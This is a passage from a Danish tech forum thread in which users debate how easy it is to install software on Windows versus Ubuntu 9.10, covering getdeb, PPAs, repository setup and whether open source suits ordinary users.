4) Security warning, om jeg vil hente eller køre en download fra amazonaws.com. Vælg Run (det kræver færrest klik).
5) Vil du kører softaren? (Vi har lige valgt run?!) Tryk RUN. Forresten er den digitalt underskrevet af "POTI. Inc" .. er det dem der laver songbird?
6) Nu skal vi svare på om softwaren må lave ændringer i mit system, jeg svarer Yes. (Show details, viser ingen detailer om hvilke ændringer der skal fortages)
7) Nu skal vi vælge hvilke komponenter der skal installeres, jeg svarer next.
8) Nu skal vi vælge hvad det skal hedde i menu'en. Next.
9) Hvor skal det installeres. Next.
10) Vi er færdige, og skal lige trykke finish.
11) Derefter skal applikationen startes og der skal igen tages stilling til en række ting, og mere software skal downloades ... men det gider jeg ikke at tælle med.
#89
Jo, i 9.10 er det langt nemmere. Se fx. på getdeb.net, de har taget det til sig.
Installation af getdeb repository: Klik på et link. Din pakkemanager spørger nu om du vil installere getdeb. Klik OK. Vent. Når den er færdig, klik OK.
Så kan du installere software fra getdeb som normalt med din pakkemanager.
Du kan også browsere på deres hjemmeside. Hvis du finder noget godt kan du igen med 2 klik få din pakkemanager til at installere det.
Jo, i 9.10 er det langt nemmere. Se fx. på getdeb.net, de har taget det til sig.
Installation af getdeb repository: Klik på et link. Din pakkemanager spørger nu om du vil installere getdeb. Klik OK. Vent. Når den er færdig, klik OK.
Så kan du installere software fra getdeb som normalt med din pakkemanager.
Du kan også browsere på deres hjemmeside. Hvis du finder noget godt kan du igen med 2 klik få din pakkemanager til at installere det.
myplacedk (90) skrev:#89
Installation af getdeb repository: Klik på et link. Din pakkemanager spørger nu om du vil installere getdeb. Klik OK. Vent. Når den er færdig, klik OK.
Som jeg kan læse på getdeb.net, er getdeb.net et dårligt eksempel at bruge. Deres repo er helt nyt, dvs. de havde ikke noget før Ubuntu 9.10.
At man kan sætte et repo op via en .deb pakke, er ej nyt.
#91
Jeg forstår ikke helt hvad du mener.
Getdeb er vildt nemt at bruge. Det er ren peg-og-klik, præcist hvad Windcape efterspørger. That's all.
Som jeg har forstået det udnytter de en eller flere nyheder i Ubuntu 9.10. Men uanset om det er sandt, gælder ovenstående stadig.
Jeg forstår ikke helt hvad du mener.
Getdeb er vildt nemt at bruge. Det er ren peg-og-klik, præcist hvad Windcape efterspørger. That's all.
Som jeg har forstået det udnytter de en eller flere nyheder i Ubuntu 9.10. Men uanset om det er sandt, gælder ovenstående stadig.
myplacedk (92) skrev:#91
Jeg forstår ikke helt hvad du mener.
Du skriver at Ubuntu 9.10 er langt nemmere ... jeg skriver at getdeb tilbyder et repos til version 9.10.
De andre repos der fandtes til version 7.10 var lige så nemme .. eller er der noget jeg har overset? ... hvis, må du forklare det.
clysel (93) skrev:Du skriver at Ubuntu 9.10 er langt nemmere ... jeg skriver at getdeb tilbyder et repos til version 9.10.
Jeg kan ikke se hvordan getdebs repos oprettelsesdato skulle sige noget om hvornår hvilke features er kommet i Ubuntu.
clysel (93) skrev:De andre repos der fandtes til version 7.10 var lige så nemme .. eller er der noget jeg har overset? ... hvis, må du forklare det.
Jeg har ikke før Ubuntu 9.10 set at man kan starte en opgave pakkemanageren ved at klikke på et link på en hjemmeside. Højest at man kan downloade en deb-pakke, og installere den med et par klik.
Jeg har heller ikke før Ubuntu 9.10 set at man kan tilføje repos på en måde, som er nem nok til at jeg vil lade min mor gøre det via telefon-instruktioner.
myplacedk (94) skrev:Jeg kan ikke se hvordan getdebs repos oprettelsesdato skulle sige noget om hvornår hvilke features er kommet i Ubuntu.
Præsis, getdebs var et dårligt eksempel.
myplacedk (94) skrev:Jeg har heller ikke før Ubuntu 9.10 set at man kan tilføje repos på en måde, som er nem nok til at jeg vil lade min mor gøre det via telefon-instruktioner.
Jeg gætter på du snakker om PGP nøgle importen?
Lmao2008 (59) skrev:#MYPLACEDK
jeg gentager lige mig selv igen igen og igen.
Er man alm. bruger er OpenS ikke et godt valg. Jeg går ud fra du ikke er en alm. bruger.
Altså de kunder jeg servicere er alm. brugere hvis ikke totalt nybegyndere og de fatter slet ikke hvad update er og derfor er der et stort problem. Og nej de har ikke alle sammen windows... der er desværre nogen der er faldet i god salgs teknik og købt en billig pc med linux på og er efter mit besøg blevet rigtig glade for deres PC'er som nu har windows. Fordi nu for de hjælp i hovede og røv.
Altså OpenS til nørder og superbruger og ikke til alm Brugere.
Nu behøver jeg vel ikke skrive det igen ?
nu vil jeg kaste med sten..
Google Chrome er Open Source.. and guess what..!!!
den auto updater.. :-O
http://newz.dk/googles-chrome-opdaterer-sig-selv
den spørger ikke engang.. den gør det bare..
så hvis du vil være en venlig sjæl at fortælle hvor det er at open source er et mindre sikkert valg, en closed source, så fyr løs..
som nævnt før, så handler det på ingen måde om åben og lukket software.. det handler om dem som har LAVET softwaren, det er dem som står til regnskab for hvor godt brugeren bliver gjort opmærksom på at programmet skal opdateres...
ingen andre..
clysel (95) skrev:Præsis, getdebs var et dårligt eksempel.
Det var et eksempel på hvor nemt det kan være. Og nemt, det er det sgu.
clysel (95) skrev:Jeg gætter på du snakker om PGP nøgle importen?
Jeg snakker om det hele. Klik-klik, og alt er på plads. Ikke noget med strenge der skal kopieres osv.
clysel (95) skrev:Jeg gætter på du snakker om PGP nøgle importen?
Jeg snakker om det hele. Klik-klik, og alt er på plads. Ikke noget med strenge der skal kopieres osv. [/quote]
klik-klik ... mener du .deb filen der sætter repoet op ... har man ikke "alid" kunne dette?
clysel (98) skrev:klik-klik ... mener du .deb filen der sætter repoet op ...
Nej, jeg mener det hele. Det at hele processen kan klares så nemt.
myplacedk (94) skrev:Jeg har ikke før Ubuntu 9.10 set at man kan starte en opgave pakkemanageren ved at klikke på et link på en hjemmeside. Højest at man kan downloade en deb-pakke, og installere den med et par klik.
Jeg har heller ikke før Ubuntu 9.10 set at man kan tilføje repos på en måde, som er nem nok til at jeg vil lade min mor gøre det via telefon-instruktioner.
I det sidste afsnit tænkte jeg egentlig mest på PPA'erne, som kan tilføjes uden at skulle installere en deb-fil.
*undersøge-undersøge*
Teknisk set har muligheden været der siden 7.10. Det nye må så være at det er med i en default installation, og at folk er begyndt at bruge det.
Opret dig som bruger i dag
Det er gratis, og du binder dig ikke til noget.
Når du er oprettet som bruger, får du adgang til en lang række af sidens andre muligheder, såsom at udforme siden efter eget ønske og deltage i diskussionerne.
- Forside
- ⟨
- Forum
- ⟨
- Nyheder
Gå til bund